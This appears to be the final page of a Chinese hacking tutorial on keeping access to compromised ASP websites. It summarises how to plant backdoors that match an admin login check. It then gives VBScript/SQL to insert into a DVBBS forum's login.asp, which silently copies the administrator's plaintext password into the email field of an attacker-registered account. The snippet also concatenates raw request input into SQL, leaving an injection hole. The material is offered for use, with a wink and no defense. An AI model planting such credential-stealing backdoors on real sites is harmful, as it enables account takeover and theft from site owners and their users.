图三

　　呵呵，别做坏事哦............

　　小结一下：我们先找到弄到管理员账号，然后找到它的验证页面，根据它的验证内容来写入我们要的后门。不同的系统有不同的验证方式，比如青创文章系统它不但要验证你的用户名还要验证等级，但是我们总体思路还是一样，就是他验证什么我们就加入什么。

　　密码窃探篇

　　可以说上述方法在动网论坛或者其他论坛面前是苍白无力的，因为一般论坛由于交互性较强，所以在验证上考虑了很多。以动网为例，你要登录后台，他先验证你有没有先登录了前台，没有的话就给你返回一个错误页面。你登录前台后系统会给你一个seession来记录你的CacheName和你的ID，然后在你登录后台的时候拿出来比较你前后台身份是否一致，一直就通过，否则kill，面对这样严格的验证，难道我们就没有办法基后台了吗？对，没有了（谁拿鸡蛋扔我？这么浪费。），但是我们可以想新的办法，既然验证这么严格，那么我如果拿着密码光明正大的进去呢？因此，这里一个新的思路就是拿到它的明文密码。什么时候有明文密码呢？对了，就在管理员登录的时候。好，我们就在那里做手脚，把它登录的密码发给我们，然后我们拿和它的密码去登录。呵呵，是不是很像sniffer啊？在下在前几个月刚和好兄弟潜龙在野利用硬件sniffer配合省网安局的人端掉一个非法电影网站，足足4000G的硬盘，几十台服务器，一个字：爽

　　好了，我们开始修改它的程序。编辑login.asp，加入以下几句话：

　　if not isnull(trim(request("username"))) then

　　if request("username")="admin" then

　　sql="update [Dv_Vser] set UserEmail=(select userpassword from

　　[Dv_User]

　　where username='"& request("username")&"') where

　　UserName='aweige'"

　　conn.execute(sql)

　　end if

　　end if　　

　　这几句话的意思就是说如果admin（假设的，实际操作中改为你要的管理员名字）登录成功就更新数据库，把他的密码放到我资料的E-mail中。当然，你必须先在论坛里注册一个用户名。结果如图四：

　　图四

　　还有，如果是动网7.0以下的默认数据库admin表名和7.0以上有点不一样，所以实际操作中不可生搬硬套。


　　后记：

　　对于以上两种方法直到目前为止我还想不出任何比较有效的解决方法，因为你的网站被人家放了马，你根本就没办法去阻止人家去插入，要是谁有好的解决方法记得告诉我。

上一页  [1] [2] [3] 下一页